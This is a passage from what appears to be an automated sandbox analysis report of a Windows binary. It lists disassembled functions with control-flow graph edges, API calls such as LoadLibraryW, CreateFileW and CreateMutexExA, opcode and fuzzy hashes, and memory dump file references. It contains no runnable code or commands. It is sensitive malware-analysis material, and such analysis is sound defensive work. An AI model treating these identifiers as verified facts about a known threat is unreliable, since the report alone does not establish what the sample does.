                                                                                • API ID:
                                                                                • String ID: .4[$ .4[
                                                                                • API String ID: 0-1397926279
                                                                                • Opcode ID: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                                                • Instruction ID: 7786e97b6d08a5630040fe6da0d6bf01a7fd5cbe43300facc9c0bd90aec280e3
                                                                                • Opcode Fuzzy Hash: b20a826bc81dfcab3da981ddef80fad3685b7aed7b382253dbf3b8e6d869c42f
                                                                                • Instruction Fuzzy Hash: FE51C712A1ABC885EA218F39B4413A9A7A0BF98795F144331FDCDA2771EF3DE5C18700
                                                                                Function 00007FF6CC3588F7 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1490 7ff6cc3588f7-7ff6cc3588fc 1491 7ff6cc358902-7ff6cc358907 1490->1491 1492 7ff6cc3592d0-7ff6cc3592d5 1490->1492 1495 7ff6cc35890d-7ff6cc358912 1491->1495 1496 7ff6cc359adc-7ff6cc359b34 call 7ff6cc3b6310 1491->1496 1493 7ff6cc3592db-7ff6cc3592e0 1492->1493 1494 7ff6cc35a52d-7ff6cc35a562 1492->1494 1497 7ff6cc35a56a-7ff6cc35a59c 1493->1497 1498 7ff6cc3592e6-7ff6cc3592eb 1493->1498 1494->1497 1500 7ff6cc359b39-7ff6cc359b46 1495->1500 1501 7ff6cc358918-7ff6cc35891d 1495->1501 1503 7ff6cc358380-7ff6cc3583a6 1496->1503 1502 7ff6cc3592f1-7ff6cc359302 1498->1502 1498->1503 1505 7ff6cc359b48 1500->1505 1506 7ff6cc359b50-7ff6cc359b6d 1500->1506 1501->1503 1507 7ff6cc358923-7ff6cc358947 1501->1507 1508 7ff6cc35930c-7ff6cc359323 LoadLibraryW 1502->1508 1509 7ff6cc359304 1502->1509 1513 7ff6cc3583ac-7ff6cc3583b1 1503->1513 1514 7ff6cc358781-7ff6cc358786 1503->1514 1505->1506 1506->1503 1507->1503 1508->1503 1509->1508 1517 7ff6cc3583b7-7ff6cc3583bc 1513->1517 1518 7ff6cc3589e8-7ff6cc3589ed 1513->1518 1515 7ff6cc35878c-7ff6cc358791 1514->1515 1516 7ff6cc358ca4-7ff6cc358ca9 1514->1516 1521 7ff6cc358797-7ff6cc35879c 1515->1521 1522 7ff6cc3591a0-7ff6cc3591a5 1515->1522 1519 7ff6cc35959c-7ff6cc3595a1 1516->1519 1520 7ff6cc358caf-7ff6cc358cb4 1516->1520 1525 7ff6cc3583c2-7ff6cc3583c7 1517->1525 1526 7ff6cc358f10-7ff6cc358f15 1517->1526 1523 7ff6cc3589f3-7ff6cc3589f8 1518->1523 1524 7ff6cc3593b4-7ff6cc3593b9 1518->1524 1537 7ff6cc3595a7-7ff6cc3595ac 1519->1537 1538 7ff6cc35a752-7ff6cc35a7c8 1519->1538 1531 7ff6cc358cba-7ff6cc358cbf 1520->1531 1532 7ff6cc359fbd-7ff6cc359fcc 1520->1532 1539 7ff6cc35999b-7ff6cc3599c2 1521->1539 1540 7ff6cc3587a2-7ff6cc3587a7 1521->1540 1527 7ff6cc3591ab-7ff6cc3591b0 1522->1527 1528 7ff6cc35a3b6-7ff6cc35a3db 1522->1528 1541 7ff6cc359c0b-7ff6cc359c1d 1523->1541 1542 7ff6cc3589fe-7ff6cc358a03 1523->1542 1533 7ff6cc35a665-7ff6cc35a67e 1524->1533 1534 7ff6cc3593bf-7ff6cc3593c4 1524->1534 1529 7ff6cc35979b-7ff6cc35a4fa 1525->1529 1530 7ff6cc3583cd-7ff6cc3583d2 1525->1530 1535 7ff6cc358f1b-7ff6cc358f20 1526->1535 1536 7ff6cc35a152-7ff6cc35a16c call 7ff6cc3b5870 1526->1536 1543 7ff6cc3591b6-7ff6cc3591bb 1527->1543 1544 7ff6cc35a3e0-7ff6cc35a425 call 7ff6cc3b5750 1527->1544 1528->1503 1529->1503 1545 7ff6cc3583d8-7ff6cc3583dd 1530->1545 1546 7ff6cc359802-7ff6cc359807 1530->1546 1555 7ff6cc358cc5-7ff6cc358cca 1531->1555 1556 7ff6cc359fd1-7ff6cc359fd6 1531->1556 1532->1503 1533->1503 1547 7ff6cc3593ca-7ff6cc3593cf 1534->1547 1548 7ff6cc35a683-7ff6cc35a695 1534->1548 1558 7ff6cc358f26-7ff6cc358f2b 1535->1558 1559 7ff6cc35a171-7ff6cc35a18a 1535->1559 1536->1503 1537->1503 1549 7ff6cc3595b2-7ff6cc3595c6 1537->1549 1538->1503 1539->1503 1550 7ff6cc3587ad-7ff6cc3587b2 1540->1550 1551 7ff6cc3599c7-7ff6cc3599e9 call 7ff6cc396e50 1540->1551 1541->1503 1553 7ff6cc358a09-7ff6cc358a0e 1542->1553 1554 7ff6cc359c22-7ff6cc359c53 1542->1554 1543->1503 1560 7ff6cc3591c1-7ff6cc3591ce 1543->1560 1544->1503 1545->1503 1561 7ff6cc3583df-7ff6cc358416 call 7ff6cc3b5750 1545->1561 1546->1503 1547->1503 1562 7ff6cc3593d5-7ff6cc359416 1547->1562 1548->1503 1549->1503 1550->1503 1563 7ff6cc3587b8-7ff6cc3587ca 1550->1563 1551->1503 1553->1503 1565 7ff6cc358a14-7ff6cc358a2f 1553->1565 1554->1503 1555->1503 1566 7ff6cc358cd0-7ff6cc358cd5 1555->1566 1556->1503 1558->1503 1568 7ff6cc358f31-7ff6cc358f52 1558->1568 1559->1503 1560->1503 1561->1503 1562->1503 1563->1503 1565->1503 1566->1503 1572 7ff6cc358f5c-7ff6cc358f90 call 7ff6cc35a9d0 call 7ff6cc34cff0 1568->1572 1573 7ff6cc358f54 1568->1573 1572->1503 1573->1572
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: H]c
                                                                                • API String ID: 1029625771-2876529112
                                                                                • Opcode ID: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                                                • Instruction ID: 19997394d04abd37560048aa9c727d10fbb70d58e7e02e9a9bb02d7e76f183f5
                                                                                • Opcode Fuzzy Hash: 22659ce9d2d9c4400367f5563eabec873a4e7434cc56b6bd7b861703e8035eef
                                                                                • Instruction Fuzzy Hash: C2517F76A4D7C681EE748E58B0947BE7390EB84761F200A32DAEEC77D4CE2CD4408B42
                                                                                Function 00007FF6CC392BA0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1580 7ff6cc392ba0-7ff6cc392bc0 1581 7ff6cc392c10-7ff6cc392c15 1580->1581 1582 7ff6cc392c50-7ff6cc392c55 1581->1582 1583 7ff6cc392c17-7ff6cc392c1c 1581->1583 1584 7ff6cc392cc3-7ff6cc392cc8 1582->1584 1585 7ff6cc392c57-7ff6cc392c5c 1582->1585 1586 7ff6cc392c1e-7ff6cc392c23 1583->1586 1587 7ff6cc392c90-7ff6cc392c95 1583->1587 1592 7ff6cc392d37-7ff6cc392d44 1584->1592 1593 7ff6cc392cca-7ff6cc392ccf 1584->1593 1588 7ff6cc392d02-7ff6cc392d13 1585->1588 1589 7ff6cc392c62-7ff6cc392c67 1585->1589 1594 7ff6cc392ce2-7ff6cc392ce7 1586->1594 1595 7ff6cc392c29-7ff6cc392c2e 1586->1595 1590 7ff6cc392d22-7ff6cc392d32 1587->1590 1591 7ff6cc392c9b-7ff6cc392ca0 1587->1591 1588->1581 1596 7ff6cc392d18-7ff6cc392d1d 1589->1596 1597 7ff6cc392c6d-7ff6cc392c72 1589->1597 1590->1581 1598 7ff6cc392bc2-7ff6cc392c02 CreateFileW 1591->1598 1599 7ff6cc392ca6-7ff6cc392cab 1591->1599 1592->1581 1600 7ff6cc392cd1-7ff6cc392cdd 1593->1600 1601 7ff6cc392d49-7ff6cc392d4e 1593->1601 1594->1581 1602 7ff6cc392c34-7ff6cc392c39 1595->1602 1603 7ff6cc392cec-7ff6cc392cfd 1595->1603 1596->1581 1597->1581 1606 7ff6cc392c74-7ff6cc392c85 1597->1606 1598->1581 1599->1581 1608 7ff6cc392cb1-7ff6cc392cbe 1599->1608 1600->1581 1601->1581 1607 7ff6cc392d54-7ff6cc392d63 1601->1607 1602->1581 1604 7ff6cc392c3b-7ff6cc392c4c 1602->1604 1603->1581 1604->1581 1606->1581 1608->1581
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: phV
                                                                                • API String ID: 0-1350728776
                                                                                • Opcode ID: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                                                • Instruction ID: 005990a5313f1ac9c61b5f8c1fba0e59cfdbe61da0fe4a01f1fb3e87dc02439b
                                                                                • Opcode Fuzzy Hash: 1c327526c952085a47468b5600888ca0ba0485a323d74705545f572e516c9b2e
                                                                                • Instruction Fuzzy Hash: 5541C321A0DD8285E9701F19B481B3E1690AB557B5F244A32EEBCC73D1CE2EE8D0474A
                                                                                Function 00007FF6CC346A50 Relevance: 3.3, APIs: 2, Instructions: 309COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1609 7ff6cc346a50-7ff6cc346aaa call 7ff6cc33eb50 1612 7ff6cc346ad0-7ff6cc346ad7 1609->1612 1613 7ff6cc346ad9-7ff6cc346adf 1612->1613 1614 7ff6cc346b50-7ff6cc346b56 1612->1614 1617 7ff6cc346bc0-7ff6cc346bc6 1613->1617 1618 7ff6cc346ae5-7ff6cc346aeb 1613->1618 1615 7ff6cc346b5c-7ff6cc346b62 1614->1615 1616 7ff6cc346c10-7ff6cc346c16 1614->1616 1619 7ff6cc346b68-7ff6cc346b6e 1615->1619 1620 7ff6cc346c7c-7ff6cc346c82 1615->1620 1623 7ff6cc346cf7-7ff6cc346cfd 1616->1623 1624 7ff6cc346c1c-7ff6cc346c22 1616->1624 1621 7ff6cc346cc7-7ff6cc346ccd 1617->1621 1622 7ff6cc346bcc-7ff6cc346bd2 1617->1622 1625 7ff6cc346c4c-7ff6cc346c52 1618->1625 1626 7ff6cc346af1-7ff6cc346af7 1618->1626 1629 7ff6cc346d8a-7ff6cc346d90 1619->1629 1630 7ff6cc346b74-7ff6cc346b7a 1619->1630 1631 7ff6cc346c88-7ff6cc346c8e 1620->1631 1632 7ff6cc346e4b-7ff6cc346e51 1620->1632 1635 7ff6cc346eea-7ff6cc346efe 1621->1635 1636 7ff6cc346cd3-7ff6cc346cd9 1621->1636 1633 7ff6cc346bd8-7ff6cc346bde 1622->1633 1634 7ff6cc346ddf-7ff6cc346de5 1622->1634 1641 7ff6cc346f03-7ff6cc346f16 1623->1641 1642 7ff6cc346d03-7ff6cc346d09 1623->1642 1637 7ff6cc346c28-7ff6cc346c2e 1624->1637 1638 7ff6cc346e03-7ff6cc346e09 1624->1638 1627 7ff6cc346c58-7ff6cc346c5e 1625->1627 1628 7ff6cc346e35-7ff6cc346e3b 1625->1628 1639 7ff6cc346d48-7ff6cc346d50 1626->1639 1640 7ff6cc346afd-7ff6cc346b03 1626->1640 1645 7ff6cc346ecc-7ff6cc346edb 1627->1645 1646 7ff6cc346c64-7ff6cc346c6c 1627->1646 1643 7ff6cc346fb9-7ff6cc346fc1 1628->1643 1644 7ff6cc346e41-7ff6cc346e46 1628->1644 1660 7ff6cc346d96-7ff6cc346d9e 1629->1660 1661 7ff6cc346f32-7ff6cc346f4b 1629->1661 1657 7ff6cc346b80-7ff6cc346b88 1630->1657 1658 7ff6cc346e83-7ff6cc346e93 call 7ff6cc3b5870 1630->1658 1649 7ff6cc346ee0-7ff6cc346ee5 1631->1649 1650 7ff6cc346c94-7ff6cc346c9c 1631->1650 1647 7ff6cc346fc9-7ff6cc346fd1 1632->1647 1648 7ff6cc346e57-7ff6cc346e6b 1632->1648 1662 7ff6cc346e98-7ff6cc346e9f 1633->1662 1663 7ff6cc346be4-7ff6cc346bec 1633->1663 1664 7ff6cc346deb-7ff6cc346df3 1634->1664 1665 7ff6cc346f64-7ff6cc346f7d 1634->1665 1635->1612 1651 7ff6cc346aac-7ff6cc346acb 1636->1651 1652 7ff6cc346cdf-7ff6cc346ce7 1636->1652 1666 7ff6cc346eb8-7ff6cc346ec7 1637->1666 1667 7ff6cc346c34-7ff6cc346c3c 1637->1667 1668 7ff6cc346f81-7ff6cc346f92 1638->1668 1669 7ff6cc346e0f-7ff6cc346e17 1638->1669 1639->1612 1659 7ff6cc346d56-7ff6cc346d5e 1639->1659 1653 7ff6cc346b09-7ff6cc346b11 1640->1653 1654 7ff6cc346e70-7ff6cc346e7e call 7ff6cc3af570 1640->1654 1641->1612 1655 7ff6cc346f1b-7ff6cc346f2d 1642->1655 1656 7ff6cc346d0f-7ff6cc346d17 1642->1656 1643->1612 1682 7ff6cc346fc7 1643->1682 1644->1612 1645->1612 1646->1612 1685 7ff6cc346c72-7ff6cc346c77 1646->1685 1647->1612 1684 7ff6cc346fd7 call 7ff6cc3b47d0 1647->1684 1648->1612 1649->1612 1650->1612 1686 7ff6cc346ca2-7ff6cc346cb6 1650->1686 1651->1612 1652->1612 1687 7ff6cc346ced-7ff6cc346cf2 1652->1687 1653->1612 1673 7ff6cc346b13-7ff6cc346b4b FindCloseChangeNotification 1653->1673 1654->1612 1655->1612 1656->1612 1688 7ff6cc346d1d-7ff6cc346d38 1656->1688 1657->1612 1675 7ff6cc346b8e-7ff6cc346bb6 1657->1675 1658->1612 1659->1612 1689 7ff6cc346d64-7ff6cc346d85 1659->1689 1660->1612 1690 7ff6cc346da4-7ff6cc346dcf 1660->1690 1676 7ff6cc346f4d 1661->1676 1677 7ff6cc346f53-7ff6cc346f5f 1661->1677 1662->1651 1672 7ff6cc346ea5-7ff6cc346ead 1662->1672 1663->1612 1679 7ff6cc346bf2-7ff6cc346c03 1663->1679 1664->1612 1691 7ff6cc346df9-7ff6cc346dfe 1664->1691 1665->1676 1678 7ff6cc346f7f 1665->1678 1666->1612 1667->1612 1683 7ff6cc346c42-7ff6cc346c47 1667->1683 1680 7ff6cc346f9c-7ff6cc346fb4 CreateMutexExA 1668->1680 1681 7ff6cc346f94 1668->1681 1669->1612 1692 7ff6cc346e1d-7ff6cc346e30 1669->1692 1672->1651 1698 7ff6cc346eb3 1672->1698 1673->1612 1675->1612 1676->1677 1677->1612 1678->1677 1679->1612 1680->1612 1681->1680 1701 7ff6cc346fdc-7ff6cc346ff0 1682->1701 1683->1612 1684->1701 1685->1612 1695 7ff6cc346cb8 1686->1695 1696 7ff6cc346cbd-7ff6cc346cc2 1686->1696 1687->1612 1688->1612 1699 7ff6cc346d3e-7ff6cc346d43 1688->1699 1689->1612 1690->1612 1700 7ff6cc346dd5-7ff6cc346dda 1690->1700 1691->1612 1692->1612 1695->1696 1696->1612 1698->1612 1699->1612 1700->1612
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                                                • Instruction ID: afc605360e7bc8a05768f36dc8d0430638d6dce99b95d8f14e04d5ffe1deb00c
                                                                                • Opcode Fuzzy Hash: c2292ebe08780314e4adfa5601333d20add2fb2094969b9d607540565dfbd5b6
                                                                                • Instruction Fuzzy Hash: 87C10A66B0CAD586E678CF18B49093D6AB1DF94752F24813AF5CFC7BA5CE2EE8404701
                                                                                Function 00007FF6CC3B5680 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1717 7ff6cc3b5680-7ff6cc3b56a4 1718 7ff6cc3b56c0-7ff6cc3b56c5 1717->1718 1719 7ff6cc3b56e0-7ff6cc3b56e5 1718->1719 1720 7ff6cc3b56c7-7ff6cc3b56cc 1718->1720 1723 7ff6cc3b5707-7ff6cc3b572d RtlAllocateHeap 1719->1723 1724 7ff6cc3b56e7-7ff6cc3b56ec 1719->1724 1721 7ff6cc3b56ce-7ff6cc3b56d3 1720->1721 1722 7ff6cc3b56a6-7ff6cc3b56bc call 7ff6cc3b6260 1720->1722 1726 7ff6cc3b572f-7ff6cc3b5734 1721->1726 1727 7ff6cc3b56d5-7ff6cc3b56da 1721->1727 1722->1718 1723->1718 1724->1718 1728 7ff6cc3b56ee-7ff6cc3b5705 1724->1728 1726->1718 1730 7ff6cc3b5736-7ff6cc3b5740 1726->1730 1727->1718 1728->1718
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                                                • Instruction ID: 50ef0addefb14ce4844b32e41ff99615e49294fddce0ef3f61ee3b4de9544c6a
                                                                                • Opcode Fuzzy Hash: 4faf41ec06b3e23b2a523de89ed0d25d4b8a44d6bcfc364d0d1b8fde628e55b4
                                                                                • Instruction Fuzzy Hash: B811A321E1CF8682EB708F09B89563E6391FB887A5F946532E9CDC7364CE2CD9904B10
                                                                                Function 00007FF6CC3B13D0 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1731 7ff6cc3b13d0-7ff6cc3b13ea 1732 7ff6cc3b141d-7ff6cc3b1423 1731->1732 1733 7ff6cc3b13f0-7ff6cc3b1418 IsDlgButtonChecked 1732->1733 1734 7ff6cc3b1425-7ff6cc3b142b 1732->1734 1733->1732 1734->1732 1735 7ff6cc3b142d-7ff6cc3b144a 1734->1735
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: ButtonChecked
                                                                                • String ID:
                                                                                • API String ID: 1719414920-0
                                                                                • Opcode ID: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                                                • Instruction ID: 840a0e0ae3250d78c1a6b10e954a5cae82c8d12cb59fefb00ab7843be7a19cd3
                                                                                • Opcode Fuzzy Hash: 8022003f6e2f41d1cbb1c1a2500ad300834d9a2de675accbe64d5ac772841aff
                                                                                • Instruction Fuzzy Hash: 6DF0C267B0C68044EA344A22F55467AAB709B99BF9F580475EDCDC7BA8DE1DC7818B00
                                                                                Function 00007FF6CC3B5750 Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1736 7ff6cc3b5750-7ff6cc3b5789 1737 7ff6cc3b57ac-7ff6cc3b57b2 1736->1737 1738 7ff6cc3b5790-7ff6cc3b57a7 RtlAllocateHeap 1737->1738 1739 7ff6cc3b57b4-7ff6cc3b57ba 1737->1739 1738->1737 1739->1737 1740 7ff6cc3b57bc-7ff6cc3b57ca 1739->1740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                                                • Instruction ID: 5520a4cedeed52c061e091fb35bf568c59ffcaba722c8b63691c4421c881448b
                                                                                • Opcode Fuzzy Hash: b25cc3113dd86b04c92176b4dd5d17831dfa282fd6b183da344929aff430cdf9
                                                                                • Instruction Fuzzy Hash: ABF01D25729F84D5DAA88B15F89022EB7A8F7C8790F101025FA8EC3B68DF3DC4908B00
                                                                                Function 00007FF6CC3B5620 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1741 7ff6cc3b5620-7ff6cc3b564b 1742 7ff6cc3b5666-7ff6cc3b566b 1741->1742 1743 7ff6cc3b5650-7ff6cc3b5661 RtlDeleteBoundaryDescriptor 1742->1743 1744 7ff6cc3b566d-7ff6cc3b5672 1742->1744 1743->1742 1744->1742 1745 7ff6cc3b5674-7ff6cc3b5679 1744->1745
                                                                                APIs
                                                                                • RtlDeleteBoundaryDescriptor.NTDLL(1063196CE2D18368,00007FF6CC34B179), ref: 00007FF6CC3B565F
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: BoundaryDeleteDescriptor
                                                                                • String ID:
                                                                                • API String ID: 3203483114-0
                                                                                • Opcode ID: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                                                • Instruction ID: 2391b02f307bc635ace727109872927127344c7f5d856f3e5665f33884d385ab
                                                                                • Opcode Fuzzy Hash: f8a6caf642e7dde747f3668db656015144ee31b773714cb89d60c9f462be7e55
                                                                                • Instruction Fuzzy Hash: C2E03025A08B9685DA608B16B4505696391AB8DBA4F288231D9CDC7735DE28D6924A00
                                                                                Function 00007FF6CC3B5C40 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1746 7ff6cc3b5c40-7ff6cc3b5c5f 1747 7ff6cc3b5c8f-7ff6cc3b5c95 1746->1747 1748 7ff6cc3b5c70-7ff6cc3b5c8a RtlAllocateHeap 1747->1748 1749 7ff6cc3b5c97-7ff6cc3b5c9d 1747->1749 1748->1747 1749->1747 1750 7ff6cc3b5c9f-7ff6cc3b5cad 1749->1750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                                                • Instruction ID: b9252ae127104174f429a524104573a399078828744a2292d3e8c3ebdf9bb59d
                                                                                • Opcode Fuzzy Hash: 6913a8b6b8e01bfe0bec69148d23480b8e70842ed5ff58631cda6bdff29f57c7
                                                                                • Instruction Fuzzy Hash: 07F06525A18F8485DAB89B05B8E023A67A2FB88755F400176EE8FD3764CE3CD4518710
                                                                                Function 00007FF6CC392F40 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1751 7ff6cc392f40-7ff6cc392f52 1752 7ff6cc392f74-7ff6cc392f7a 1751->1752 1753 7ff6cc392f60-7ff6cc392f6f GetFileAttributesA 1752->1753 1754 7ff6cc392f7c-7ff6cc392f82 1752->1754 1753->1752 1754->1752 1755 7ff6cc392f84-7ff6cc392f94 1754->1755
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                                                • Instruction ID: 3c81d2a166e459ba6882d435353b3152cb32706994aab63a75524b8b862e2c27
                                                                                • Opcode Fuzzy Hash: 452bfae53dbd5d28a0a72784fe65045ccb12d72f2076b1765e59c366cec007b5
                                                                                • Instruction Fuzzy Hash: DEE0D80690D6D282A5380B25306007D6B615F96375F244325E6DF916D4CD0ECA9B5B08

                                                                                Non-executed Functions

                                                                                Function 00007FF6CC3629E0 Relevance: 60.3, Strings: 44, Instructions: 5277COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
